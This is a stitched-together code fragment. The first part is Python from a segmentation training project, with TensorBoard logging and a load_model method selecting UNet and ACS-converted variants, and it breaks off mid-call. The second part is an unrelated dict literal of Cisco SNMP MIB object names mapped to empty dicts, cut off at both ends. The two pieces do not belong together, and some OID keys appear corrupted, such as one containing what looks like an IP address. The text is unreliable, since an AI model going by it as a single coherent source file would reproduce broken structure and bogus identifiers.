"training_time_ss": self.ss_timedelta,
"final_train_loss_sup": self.stats.last_avg_training_loss_per_epoch_sup,
"final_val_loss_sup": self.stats.last_avg_validation_loss_per_epoch_sup,
"stopped_early_sup": self.stats.stopped_early_sup,
"training_time_sup": self.sup_timedelta,
}
# if hasattr(self, "tester"):
# if isinstance(self.tester.dice, float):
# met_dict.update({"test_dice": self.tester.dice, "test_jaccard": self.tester.jaccard})
# elif isinstance(self.tester.dice, list):
# met_dict.update({"test_dice_{}".format(str(i)): dice for i, dice in enumerate(self.tester.dice)})
# met_dict.update({"test_jaccard_{}".format(str(i)): jacd for i, jacd in enumerate(self.tester.jaccard)})
self.tb_writer.add_hparams(hparam_dict=hpa_dict, metric_dict=met_dict)
self.tb_writer.flush()
self.tb_writer.close()
def load_model(self, **kwargs):
from ACSConv.acsconv.converters import ACSConverter
from ACSConv.experiments.lidc.resnet import FCNResNet
from_latest_checkpoint = kwargs.get("from_latest_checkpoint", False)
from_latest_improvement_ss = kwargs.get("from_latest_improvement_ss", False)
from_provided_weights = kwargs.get("from_provided_weights", False)
from_scratch = kwargs.get("from_scratch", False)
from_directory = kwargs.get("from_directory", False)
from_path = kwargs.get("from_path", False)
ensure_sup_is_completed = kwargs.get("ensure_sup_is_completed", False)
acs_kernel_split = kwargs.get("acs_kernel_split", None)
pool_features = kwargs.get("pool_features", False)
data_paralell = kwargs.get("data_paralell", True)
encoder_depth = kwargs.get("encoder_depth", [4])
branch_arch = kwargs.get("branch_arch", "single")
branch_depth = kwargs.get("branch_depth", 0)
bridge_mode = kwargs.get("bridge_mode", "multiple_classifiers")
# in_channels = kwargs.get("in_channels", 1)
# out_channels = kwargs.get("out_channels", 1)
# account_acs_out_conv = kwargs.get("account_acs_out_conv", False) # in config
# TODO fix_unsqueeze_order should be a param to the ACS converter to then add the attribute to conv layers such that the behaviour is set and not a parameter to the model or its components
fix_unsqueeze_order = kwargs.get("fix_unsqueeze_order", False)
if "unet_acs" not in self.config.model.lower():
assert acs_kernel_split is None
if self.config.model.lower() == "vnet_mg":
print("Loading VNET_MG")
self.model = UNet3D()
elif self.config.model.lower() == "unet_2d":
print("LOADING UNET 2D")
self.model = UNet(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
)
elif self.config.model.lower() == "unet_acs":
print("LOADING UNET_ACS")
self.model = UNet(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_small":
print("LOADING UNET_ACS SMALL")
self.model = UNetSmall(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_small_gn":
print("LOADING UNET_ACS SMALL GN")
self.model = UNetSmallGN(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_gn":
print("LOADING UNET_ACS GROUP NORM")
self.model = UNetGN(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_gn4":
print("LOADING UNET_ACS GROUP NORM 4")
self.model = UNetGN4(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_no_affine":
print("LOADING UNET_ACS BN NO AFFINE")
self.model = UNet(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
affine=False,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_gn_no_affine":
print("LOADING UNET_ACS GROUP NORM NO AFFINE")
self.model = UNetGNAffine(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
fix_unsqueeze_order=fix_unsqueeze_order,
)
self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_with_cls":
# dynamic setting of fc layers makes it not register on inital optimizer isntanciation
self.reload_params = True
print("LOADING UNET_ACS_CLS")
self.model = UnetACSWithClassifier(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
encoder_depth=encoder_depth,
)
# self.model = ACSConverter(self.model, acs_kernel_split=acs_kernel_split)
elif self.config.model.lower() == "unet_acs_with_cls_multi":
# dynamic setting of fc layers makes it not register on inital optimizer isntanciation
self.reload_params = True
print("LOADING UNET_ACS_CLS_MULTI")
self.model = UnetACSWithClassifier(
n_channels=self.config.in_channels,
n_classes=self.config.out_channels,
bilinear=True,
apply_sigmoid_to_output=True,
branch_arch="multi",
| |
"ciscoMgmt.10.64.2.1.1.7": {},
"ciscoMgmt.10.64.2.1.1.8": {},
"ciscoMgmt.10.64.2.1.1.9": {},
"ciscoMgmt.10.64.3.1.1.1": {},
"ciscoMgmt.10.64.3.1.1.2": {},
"ciscoMgmt.10.64.3.1.1.3": {},
"ciscoMgmt.10.64.3.1.1.4": {},
"ciscoMgmt.10.64.3.1.1.5": {},
"ciscoMgmt.10.64.3.1.1.6": {},
"ciscoMgmt.10.64.3.1.1.7": {},
"ciscoMgmt.10.64.3.1.1.8": {},
"ciscoMgmt.10.64.3.1.1.9": {},
"ciscoMgmt.10.64.4.1.1.1": {},
"ciscoMgmt.10.64.4.1.1.10": {},
"ciscoMgmt.10.64.4.1.1.2": {},
"ciscoMgmt.10.64.4.1.1.3": {},
"ciscoMgmt.10.64.4.1.1.4": {},
"ciscoMgmt.10.64.4.1.1.5": {},
"ciscoMgmt.10.64.4.1.1.6": {},
"ciscoMgmt.10.64.4.1.1.7": {},
"ciscoMgmt.10.64.4.1.1.8": {},
"ciscoMgmt.10.64.4.1.1.9": {},
"ciscoMgmt.710.19172.16.17.32.1": {},
"ciscoMgmt.710.19172.16.17.32.10": {},
"ciscoMgmt.710.196.1.1.1.11": {},
"ciscoMgmt.710.196.1.1.1.12": {},
"ciscoMgmt.710.196.1.1.1.2": {},
"ciscoMgmt.710.196.1.1.1.3": {},
"ciscoMgmt.710.196.1.1.1.4": {},
"ciscoMgmt.710.196.1.1.1.5": {},
"ciscoMgmt.710.196.1.1.1.6": {},
"ciscoMgmt.710.196.1.1.1.7": {},
"ciscoMgmt.710.196.1.1.1.8": {},
"ciscoMgmt.710.196.1.1.1.9": {},
"ciscoMgmt.710.196.1.2": {},
"ciscoMgmt.710.196.1.3.1.1": {},
"ciscoMgmt.710.196.1.3.1.10": {},
"ciscoMgmt.710.196.1.3.1.11": {},
"ciscoMgmt.710.196.1.3.1.12": {},
"ciscoMgmt.710.196.1.3.1.2": {},
"ciscoMgmt.710.196.1.3.1.3": {},
"ciscoMgmt.710.196.1.3.1.4": {},
"ciscoMgmt.710.196.1.3.1.5": {},
"ciscoMgmt.710.196.1.3.1.6": {},
"ciscoMgmt.710.196.1.3.1.7": {},
"ciscoMgmt.710.196.1.3.1.8": {},
"ciscoMgmt.710.196.1.3.1.9": {},
"ciscoMgmt.710.84.1.1.1.1": {},
"ciscoMgmt.710.84.1.1.1.10": {},
"ciscoMgmt.710.84.1.1.1.11": {},
"ciscoMgmt.710.84.1.1.1.12": {},
"ciscoMgmt.710.84.1.1.1.2": {},
"ciscoMgmt.710.84.1.1.1.3": {},
"ciscoMgmt.710.84.1.1.1.4": {},
"ciscoMgmt.710.84.1.1.1.5": {},
"ciscoMgmt.710.84.1.1.1.6": {},
"ciscoMgmt.710.84.1.1.1.7": {},
"ciscoMgmt.710.84.1.1.1.8": {},
"ciscoMgmt.710.84.1.1.1.9": {},
"ciscoMgmt.710.84.1.2": {},
"ciscoMgmt.710.84.1.3.1.1": {},
"ciscoMgmt.710.84.1.3.1.10": {},
"ciscoMgmt.710.84.1.3.1.11": {},
"ciscoMgmt.710.84.1.3.1.12": {},
"ciscoMgmt.710.84.1.3.1.2": {},
"ciscoMgmt.710.84.1.3.1.3": {},
"ciscoMgmt.710.84.1.3.1.4": {},
"ciscoMgmt.710.84.1.3.1.5": {},
"ciscoMgmt.710.84.1.3.1.6": {},
"ciscoMgmt.710.84.1.3.1.7": {},
"ciscoMgmt.710.84.1.3.1.8": {},
"ciscoMgmt.710.84.1.3.1.9": {},
"ciscoMgmt.10.16.1.1.1": {},
"ciscoMgmt.10.16.1.1.2": {},
"ciscoMgmt.10.16.1.1.3": {},
"ciscoMgmt.10.16.1.1.4": {},
"ciscoMgmt.10.195.1.1.1": {},
"ciscoMgmt.10.195.1.1.10": {},
"ciscoMgmt.10.195.1.1.11": {},
"ciscoMgmt.10.195.1.1.12": {},
"ciscoMgmt.10.195.1.1.13": {},
"ciscoMgmt.10.195.1.1.14": {},
"ciscoMgmt.10.195.1.1.15": {},
"ciscoMgmt.10.195.1.1.16": {},
"ciscoMgmt.10.195.1.1.17": {},
"ciscoMgmt.10.195.1.1.18": {},
"ciscoMgmt.10.195.1.1.19": {},
"ciscoMgmt.10.195.1.1.2": {},
"ciscoMgmt.10.195.1.1.20": {},
"ciscoMgmt.10.195.1.1.21": {},
"ciscoMgmt.10.195.1.1.22": {},
"ciscoMgmt.10.195.1.1.23": {},
"ciscoMgmt.10.195.1.1.24": {},
"ciscoMgmt.10.195.1.1.3": {},
"ciscoMgmt.10.195.1.1.4": {},
"ciscoMgmt.10.195.1.1.5": {},
"ciscoMgmt.10.195.1.1.6": {},
"ciscoMgmt.10.195.1.1.7": {},
"ciscoMgmt.10.195.1.1.8": {},
"ciscoMgmt.10.195.1.1.9": {},
"ciscoMvpnConfig.1.1.1": {},
"ciscoMvpnConfig.1.1.2": {},
"ciscoMvpnConfig.1.1.3": {},
"ciscoMvpnConfig.1.1.4": {},
"ciscoMvpnConfig.2.1.1": {},
"ciscoMvpnConfig.2.1.2": {},
"ciscoMvpnConfig.2.1.3": {},
"ciscoMvpnConfig.2.1.4": {},
"ciscoMvpnConfig.2.1.5": {},
"ciscoMvpnConfig.2.1.6": {},
"ciscoMvpnGeneric.1.1.1": {},
"ciscoMvpnGeneric.1.1.2": {},
"ciscoMvpnGeneric.1.1.3": {},
"ciscoMvpnGeneric.1.1.4": {},
"ciscoMvpnProtocol.1.1.6": {},
"ciscoMvpnProtocol.1.1.7": {},
"ciscoMvpnProtocol.1.1.8": {},
"ciscoMvpnProtocol.2.1.3": {},
"ciscoMvpnProtocol.2.1.6": {},
"ciscoMvpnProtocol.2.1.7": {},
"ciscoMvpnProtocol.2.1.8": {},
"ciscoMvpnProtocol.2.1.9": {},
"ciscoMvpnProtocol.3.1.5": {},
"ciscoMvpnProtocol.3.1.6": {},
"ciscoMvpnProtocol.4.1.5": {},
"ciscoMvpnProtocol.4.1.6": {},
"ciscoMvpnProtocol.4.1.7": {},
"ciscoMvpnProtocol.5.1.1": {},
"ciscoMvpnProtocol.5.1.2": {},
"ciscoMvpnScalars": {"1": {}, "2": {}},
"ciscoNetflowMIB.1.7.1": {},
"ciscoNetflowMIB.1.7.10": {},
"ciscoNetflowMIB.1.7.11": {},
"ciscoNetflowMIB.1.7.12": {},
"ciscoNetflowMIB.1.7.13": {},
"ciscoNetflowMIB.1.7.14": {},
"ciscoNetflowMIB.1.7.15": {},
"ciscoNetflowMIB.1.7.16": {},
"ciscoNetflowMIB.1.7.17": {},
"ciscoNetflowMIB.1.7.18": {},
"ciscoNetflowMIB.1.7.19": {},
"ciscoNetflowMIB.1.7.2": {},
"ciscoNetflowMIB.1.7.20": {},
"ciscoNetflowMIB.1.7.21": {},
"ciscoNetflowMIB.1.7.22": {},
"ciscoNetflowMIB.1.7.23": {},
"ciscoNetflowMIB.1.7.24": {},
"ciscoNetflowMIB.1.7.25": {},
"ciscoNetflowMIB.1.7.26": {},
"ciscoNetflowMIB.1.7.27": {},
"ciscoNetflowMIB.1.7.28": {},
"ciscoNetflowMIB.1.7.29": {},
"ciscoNetflowMIB.1.7.3": {},
"ciscoNetflowMIB.1.7.30": {},
"ciscoNetflowMIB.1.7.31": {},
"ciscoNetflowMIB.1.7.32": {},
"ciscoNetflowMIB.1.7.33": {},
"ciscoNetflowMIB.1.7.34": {},
"ciscoNetflowMIB.1.7.35": {},
"ciscoNetflowMIB.1.7.36": {},
"ciscoNetflowMIB.1.7.37": {},
"ciscoNetflowMIB.1.7.38": {},
"ciscoNetflowMIB.1.7.4": {},
"ciscoNetflowMIB.1.7.5": {},
"ciscoNetflowMIB.1.7.6": {},
"ciscoNetflowMIB.1.7.7": {},
"ciscoNetflowMIB.10.64.8.1.10": {},
"ciscoNetflowMIB.10.64.8.1.11": {},
"ciscoNetflowMIB.10.64.8.1.12": {},
"ciscoNetflowMIB.10.64.8.1.13": {},
"ciscoNetflowMIB.10.64.8.1.14": {},
"ciscoNetflowMIB.10.64.8.1.15": {},
"ciscoNetflowMIB.10.64.8.1.16": {},
"ciscoNetflowMIB.10.64.8.1.17": {},
"ciscoNetflowMIB.10.64.8.1.18": {},
"ciscoNetflowMIB.10.64.8.1.19": {},
"ciscoNetflowMIB.10.64.8.1.2": {},
"ciscoNetflowMIB.10.64.8.1.20": {},
"ciscoNetflowMIB.10.64.8.1.21": {},
"ciscoNetflowMIB.10.64.8.1.22": {},
"ciscoNetflowMIB.10.64.8.1.23": {},
"ciscoNetflowMIB.10.64.8.1.24": {},
"ciscoNetflowMIB.10.64.8.1.25": {},
"ciscoNetflowMIB.10.64.8.1.26": {},
"ciscoNetflowMIB.10.64.8.1.3": {},
"ciscoNetflowMIB.10.64.8.1.4": {},
"ciscoNetflowMIB.10.64.8.1.5": {},
"ciscoNetflowMIB.10.64.8.1.6": {},
"ciscoNetflowMIB.10.64.8.1.7": {},
"ciscoNetflowMIB.10.64.8.1.8": {},
"ciscoNetflowMIB.10.64.8.1.9": {},
"ciscoNetflowMIB.1.7.9": {},
"ciscoPimMIBNotificationObjects": {"1": {}},
"ciscoPingEntry": {
"10": {},
"11": {},
"12": {},
"13": {},
"14": {},
"15": {},
"16": {},
"17": {},
"2": {},
"3": {},
"4": {},
"5": {},
"6": {},
"7": {},
"8": {},
"9": {},
},
"ciscoPppoeMIBObjects.10.9.1.1": {},
"ciscoProcessMIB.10.9.3.1.1": {},
"ciscoProcessMIB.10.9.3.1.10": {},
"ciscoProcessMIB.10.9.3.1.11": {},
"ciscoProcessMIB.10.9.3.1.12": {},
"ciscoProcessMIB.10.9.3.1.13": {},
"ciscoProcessMIB.10.9.3.1.14": {},
"ciscoProcessMIB.10.9.3.1.15": {},
"ciscoProcessMIB.10.9.3.1.16": {},
"ciscoProcessMIB.10.9.3.1.17": {},
"ciscoProcessMIB.10.9.3.1.18": {},
"ciscoProcessMIB.10.9.3.1.19": {},
"ciscoProcessMIB.10.9.3.1.2": {},
"ciscoProcessMIB.10.9.3.1.20": {},
"ciscoProcessMIB.10.9.3.1.21": {},
"ciscoProcessMIB.10.9.3.1.22": {},
"ciscoProcessMIB.10.9.3.1.23": {},
"ciscoProcessMIB.10.9.3.1.24": {},
"ciscoProcessMIB.10.9.3.1.25": {},
"ciscoProcessMIB.10.9.3.1.26": {},
"ciscoProcessMIB.10.9.3.1.27": {},
"ciscoProcessMIB.10.9.3.1.28": {},
"ciscoProcessMIB.10.9.3.1.29": {},
"ciscoProcessMIB.10.9.3.1.3": {},
"ciscoProcessMIB.10.9.3.1.30": {},
"ciscoProcessMIB.10.9.3.1.4": {},
"ciscoProcessMIB.10.9.3.1.5": {},
"ciscoProcessMIB.10.9.3.1.6": {},
"ciscoProcessMIB.10.9.3.1.7": {},
"ciscoProcessMIB.10.9.3.1.8": {},
"ciscoProcessMIB.10.9.3.1.9": {},
"ciscoProcessMIB.10.9.5.1": {},
"ciscoProcessMIB.10.9.5.2": {},
"ciscoSessBorderCtrlrMIBObjects": {
"73": {},
"74": {},
"75": {},
"76": {},
"77": {},
"78": {},
"79": {},
},
"ciscoSipUaMIB.10.4.7.1": {},
"ciscoSipUaMIB.10.4.7.2": {},
"ciscoSipUaMIB.10.4.7.3": {},
"ciscoSipUaMIB.10.4.7.4": {},
"ciscoSipUaMIB.10.9.10.1": {},
"ciscoSipUaMIB.10.9.10.10": {},
"ciscoSipUaMIB.10.9.10.11": {},
"ciscoSipUaMIB.10.9.10.12": {},
"ciscoSipUaMIB.10.9.10.13": {},
"ciscoSipUaMIB.10.9.10.14": {},
"ciscoSipUaMIB.10.9.10.2": {},
"ciscoSipUaMIB.10.9.10.3": {},
"ciscoSipUaMIB.10.9.10.4": {},
"ciscoSipUaMIB.10.9.10.5": {},
"ciscoSipUaMIB.10.9.10.6": {},
"ciscoSipUaMIB.10.9.10.7": {},
"ciscoSipUaMIB.10.9.10.8": {},
"ciscoSipUaMIB.10.9.10.9": {},
"ciscoSipUaMIB.10.9.9.1": {},
"ciscoSnapshotActivityEntry": {
"2": {},
"3": {},
"4": {},
"5": {},
"6": {},
"7": {},
"8": {},
},
"ciscoSnapshotInterfaceEntry": {
"2": {},
"3": {},
"4": {},
"5": {},
"6": {},
"7": {},
"8": {},
},
"ciscoSnapshotMIB.1.1": {},
"ciscoSyslogMIB.1.2.1": {},
"ciscoSyslogMIB.1.2.2": {},
"ciscoTcpConnEntry": {
"1": {},
"2": {},
"3": {},
"4": {},
"5": {},
"6": {},
"7": {},
"8": {},
"9": {},
},
"ciscoVpdnMgmtMIB.0.1": {},
"ciscoVpdnMgmtMIB.0.2": {},
"ciscoVpdnMgmtMIBObjects.10.36.1.2": {},
"ciscoVpdnMgmtMIBObjects.6.1": {},
"ciscoVpdnMgmtMIBObjects.6.2": {},
"ciscoVpdnMgmtMIBObjects.6.3": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.2": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.3": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.4": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.5": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.6": {},
"ciscoVpdnMgmtMIBObjects.10.100.1.7": {},
"ciscoVpdnMgmtMIBObjects.6.5": {},
"ciscoVpdnMgmtMIBObjects.10.144.1.3": {},
"ciscoVpdnMgmtMIBObjects.7.1": {},
"ciscoVpdnMgmtMIBObjects.7.2": {},
"clagAggDistributionAddressMode": {},
"clagAggDistributionProtocol": {},
"clagAggPortAdminStatus": {},
"clagAggProtocolType": {},
"clispExtEidRegMoreSpecificCount": {},
"clispExtEidRegMoreSpecificLimit": {},
"clispExtEidRegMoreSpecificWarningThreshold": {},
"clispExtEidRegRlocMembershipConfigured": {},
"clispExtEidRegRlocMembershipGleaned": {},
"clispExtEidRegRlocMembershipMemberSince": {},
"clispExtFeaturesEidRegMoreSpecificLimit": {},
"clispExtFeaturesEidRegMoreSpecificWarningThreshold": {},
"clispExtFeaturesMapCacheWarningThreshold": {},
"clispExtGlobalStatsEidRegMoreSpecificEntryCount": {},
"clispExtReliableTransportSessionBytesIn": {},
"clispExtReliableTransportSessionBytesOut": {},
"clispExtReliableTransportSessionEstablishmentRole": {},
"clispExtReliableTransportSessionLastStateChangeTime": {},
"clispExtReliableTransportSessionMessagesIn": {},
"clispExtReliableTransportSessionMessagesOut": {},
"clispExtReliableTransportSessionState": {},
"clispExtRlocMembershipConfigured": {},
"clispExtRlocMembershipDiscovered": {},
"clispExtRlocMembershipMemberSince": {},
"clogBasic": {"1": {}, "2": {}, "3": {}, "4": {}, "5": {}},
"clogHistoryEntry": {"2": {}, "3": {}, "4": {}, "5": {}, "6": {}},
"cmiFaAdvertChallengeChapSPI": {},
"cmiFaAdvertChallengeValue": {},
"cmiFaAdvertChallengeWindow": {},
"cmiFaAdvertIsBusy": {},
"cmiFaAdvertRegRequired": {},
"cmiFaChallengeEnable": {},
"cmiFaChallengeSupported": {},
"cmiFaCoaInterfaceOnly": {},
"cmiFaCoaRegAsymLink": {},
"cmiFaCoaTransmitOnly": {},
"cmiFaCvsesFromHaRejected": {},
"cmiFaCvsesFromMnRejected": {},
"cmiFaDeRegRepliesValidFromHA": {},
"cmiFaDeRegRepliesValidRelayToMN": {},
"cmiFaDeRegRequestsDenied": {},
"cmiFaDeRegRequestsDiscarded": {},
"cmiFaDeRegRequestsReceived": {},
"cmiFaDeRegRequestsRelayed": {},
"cmiFaDeliveryStyleUnsupported": {},
"cmiFaEncapDeliveryStyleSupported": {},
"cmiFaInitRegRepliesValidFromHA": {},
"cmiFaInitRegRepliesValidRelayMN": {},
"cmiFaInitRegRequestsDenied": {},
"cmiFaInitRegRequestsDiscarded": {},
"cmiFaInitRegRequestsReceived": {},
"cmiFaInitRegRequestsRelayed": {},
"cmiFaMissingChallenge": {},
"cmiFaMnAAAAuthFailures": {},
"cmiFaMnFaAuthFailures": {},
"cmiFaMnTooDistant": {},
"cmiFaNvsesFromHaNeglected": {},
"cmiFaNvsesFromMnNeglected": {},
"cmiFaReRegRepliesValidFromHA": {},
"cmiFaReRegRepliesValidRelayToMN": {},
"cmiFaReRegRequestsDenied": {},
"cmiFaReRegRequestsDiscarded": {},
"cmiFaReRegRequestsReceived": {},
"cmiFaReRegRequestsRelayed": {},
"cmiFaRegTotalVisitors": {},
"cmiFaRegVisitorChallengeValue": {},
"cmiFaRegVisitorHomeAddress": {},
"cmiFaRegVisitorHomeAgentAddress": {},
"cmiFaRegVisitorRegFlags": {},
"cmiFaRegVisitorRegFlagsRev1": {},
"cmiFaRegVisitorRegIDHigh": {},
"cmiFaRegVisitorRegIDLow": {},
"cmiFaRegVisitorRegIsAccepted": {},
"cmiFaRegVisitorTimeGranted": {},
"cmiFaRegVisitorTimeRemaining": {},
"cmiFaRevTunnelSupported": {},
"cmiFaReverseTunnelBitNotSet": {},
"cmiFaReverseTunnelEnable": {},
"cmiFaReverseTunnelUnavailable": {},
"cmiFaStaleChallenge": {},
"cmiFaTotalRegReplies": {},
"cmiFaTotalRegRequests": {},
"cmiFaUnknownChallenge": {},
"cmiHaCvsesFromFaRejected": {},
"cmiHaCvsesFromMnRejected": {},
"cmiHaDeRegRequestsAccepted": {},
"cmiHaDeRegRequestsDenied": {},
"cmiHaDeRegRequestsDiscarded": {},
"cmiHaDeRegRequestsReceived": {},
"cmiHaEncapUnavailable": {},
"cmiHaEncapsulationUnavailable": {},
"cmiHaInitRegRequestsAccepted": {},
"cmiHaInitRegRequestsDenied": {},
"cmiHaInitRegRequestsDiscarded": {},
"cmiHaInitRegRequestsReceived": {},
"cmiHaMnAAAAuthFailures": {},
"cmiHaMnHaAuthFailures": {},
"cmiHaMobNetDynamic": {},
"cmiHaMobNetStatus": {},
"cmiHaMrDynamic": {},
"cmiHaMrMultiPath": {},
"cmiHaMrMultiPathMetricType": {},
"cmiHaMrStatus": {},
"cmiHaNAICheckFailures": {},
"cmiHaNvsesFromFaNeglected": {},
"cmiHaNvsesFromMnNeglected": {},
"cmiHaReRegRequestsAccepted": {},
"cmiHaReRegRequestsDenied": {},
"cmiHaReRegRequestsDiscarded": {},
"cmiHaReRegRequestsReceived": {},
"cmiHaRedunDroppedBIAcks": {},
"cmiHaRedunDroppedBIReps": {},
"cmiHaRedunFailedBIReps": {},
"cmiHaRedunFailedBIReqs": {},
"cmiHaRedunFailedBUs": {},
"cmiHaRedunReceivedBIAcks": {},
"cmiHaRedunReceivedBIReps": {},
"cmiHaRedunReceivedBIReqs": {},
"cmiHaRedunReceivedBUAcks": {},
"cmiHaRedunReceivedBUs": {},
"cmiHaRedunSecViolations": {},
"cmiHaRedunSentBIAcks": {},
"cmiHaRedunSentBIReps": {},
"cmiHaRedunSentBIReqs": {},
"cmiHaRedunSentBUAcks": {},
"cmiHaRedunSentBUs": {},
"cmiHaRedunTotalSentBIReps": {},
"cmiHaRedunTotalSentBIReqs": {},
"cmiHaRedunTotalSentBUs": {},
"cmiHaRegAvgTimeRegsProcByAAA": {},
"cmiHaRegDateMaxRegsProcByAAA": {},
"cmiHaRegDateMaxRegsProcLoc": {},
"cmiHaRegMaxProcByAAAInMinRegs": {},
"cmiHaRegMaxProcLocInMinRegs": {},
"cmiHaRegMaxTimeRegsProcByAAA": {},
"cmiHaRegMnIdentifier": {},
"cmiHaRegMnIdentifierType": {},
"cmiHaRegMnIfBandwidth": {},
"cmiHaRegMnIfDescription": {},
"cmiHaRegMnIfID": {},
"cmiHaRegMnIfPathMetricType": {},
"cmiHaRegMobilityBindingRegFlags": {},
"cmiHaRegOverallServTime": {},
"cmiHaRegProcAAAInLastByMinRegs": {},
"cmiHaRegProcLocInLastMinRegs": {},
"cmiHaRegRecentServAcceptedTime": {},
"cmiHaRegRecentServDeniedCode": {},
"cmiHaRegRecentServDeniedTime": {},
"cmiHaRegRequestsDenied": {},
"cmiHaRegRequestsDiscarded": {},
"cmiHaRegRequestsReceived": {},
"cmiHaRegServAcceptedRequests": {},
"cmiHaRegServDeniedRequests": {},
"cmiHaRegTotalMobilityBindings": {},
"cmiHaRegTotalProcByAAARegs": {},
"cmiHaRegTotalProcLocRegs": {},
"cmiHaReverseTunnelBitNotSet": {},
"cmiHaReverseTunnelUnavailable": {},
"cmiHaSystemVersion": {},
"cmiMRIfDescription": {},
"cmiMaAdvAddress": {},
"cmiMaAdvAddressType": {},
"cmiMaAdvMaxAdvLifetime": {},
"cmiMaAdvMaxInterval": {},
"cmiMaAdvMaxRegLifetime": {},
"cmiMaAdvMinInterval": {},
"cmiMaAdvPrefixLengthInclusion": {},
"cmiMaAdvResponseSolicitationOnly": {},
"cmiMaAdvStatus": {},
"cmiMaInterfaceAddress": {},
"cmiMaInterfaceAddressType": {},
"cmiMaRegDateMaxRegsReceived": {},
"cmiMaRegInLastMinuteRegs": {},
"cmiMaRegMaxInMinuteRegs": {},
"cmiMnAdvFlags": {},
"cmiMnRegFlags": {},
"cmiMrBetterIfDetected": {},
"cmiMrCollocatedTunnel": {},
"cmiMrHABest": {},
"cmiMrHAPriority": {},
"cmiMrHaTunnelIfIndex": {},
"cmiMrIfCCoaAddress": {},
"cmiMrIfCCoaAddressType": {},
"cmiMrIfCCoaDefaultGw": {},
"cmiMrIfCCoaDefaultGwType": {},
"cmiMrIfCCoaEnable": {},
"cmiMrIfCCoaOnly": {},
"cmiMrIfCCoaRegRetry": {},
"cmiMrIfCCoaRegRetryRemaining": {},
"cmiMrIfCCoaRegistration": {},
"cmiMrIfHaTunnelIfIndex": {},
"cmiMrIfHoldDown": {},
"cmiMrIfID": {},
"cmiMrIfRegisteredCoA": {},
"cmiMrIfRegisteredCoAType": {},
"cmiMrIfRegisteredMaAddr": {},
"cmiMrIfRegisteredMaAddrType": {},
"cmiMrIfRoamPriority": {},
"cmiMrIfRoamStatus": {},
"cmiMrIfSolicitInterval": {},
"cmiMrIfSolicitPeriodic": {},
"cmiMrIfSolicitRetransCount": {},
"cmiMrIfSolicitRetransCurrent": {},
"cmiMrIfSolicitRetransInitial": {},
"cmiMrIfSolicitRetransLimit": {},
"cmiMrIfSolicitRetransMax": {},
"cmiMrIfSolicitRetransRemaining": {},
"cmiMrIfStatus": {},
"cmiMrMaAdvFlags": {},
"cmiMrMaAdvLifetimeRemaining": {},
"cmiMrMaAdvMaxLifetime": {},
"cmiMrMaAdvMaxRegLifetime": {},
"cmiMrMaAdvRcvIf": {},
"cmiMrMaAdvSequence": {},
"cmiMrMaAdvTimeFirstHeard": {},
"cmiMrMaAdvTimeReceived": {},
"cmiMrMaHoldDownRemaining": {},
"cmiMrMaIfMacAddress": {},
"cmiMrMaIsHa": {},
"cmiMrMobNetAddr": {},
"cmiMrMobNetAddrType": {},
"cmiMrMobNetPfxLen": {},
"cmiMrMobNetStatus": {},
"cmiMrMultiPath": {},
"cmiMrMultiPathMetricType": {},
"cmiMrRedStateActive": {},
"cmiMrRedStatePassive": {},
"cmiMrRedundancyGroup": {},
"cmiMrRegExtendExpire": {},
"cmiMrRegExtendInterval": {},
"cmiMrRegExtendRetry": {},
"cmiMrRegLifetime": {},
"cmiMrRegNewHa": {},
"cmiMrRegRetransInitial": {},
"cmiMrRegRetransLimit": {},
"cmiMrRegRetransMax": {},
"cmiMrReverseTunnel": {},
"cmiMrTunnelBytesRcvd": {},
"cmiMrTunnelBytesSent": {},
"cmiMrTunnelPktsRcvd": {},
"cmiMrTunnelPktsSent": {},
"cmiNtRegCOA": {},
"cmiNtRegCOAType": {},
"cmiNtRegDeniedCode": {},
"cmiNtRegHAAddrType": {},
"cmiNtRegHomeAddress": {},
"cmiNtRegHomeAddressType": {},
"cmiNtRegHomeAgent": {},
"cmiNtRegNAI": {},
"cmiSecAlgorithmMode": {},
"cmiSecAlgorithmType": {},
"cmiSecAssocsCount": {},
"cmiSecKey": {},
"cmiSecKey2": {},
"cmiSecRecentViolationIDHigh": {},
"cmiSecRecentViolationIDLow": {},
"cmiSecRecentViolationReason": {},
"cmiSecRecentViolationSPI": {},
"cmiSecRecentViolationTime": {},
"cmiSecReplayMethod": {},
"cmiSecStatus": {},
"cmiSecTotalViolations": {},
"cmiTrapControl": {},
"cmplsFrrConstEntry": {
"10": {},
"11": {},
"12": {},
"13": {},
"4": {},
"5": {},
"6": {},
"7": {},
"8": {},
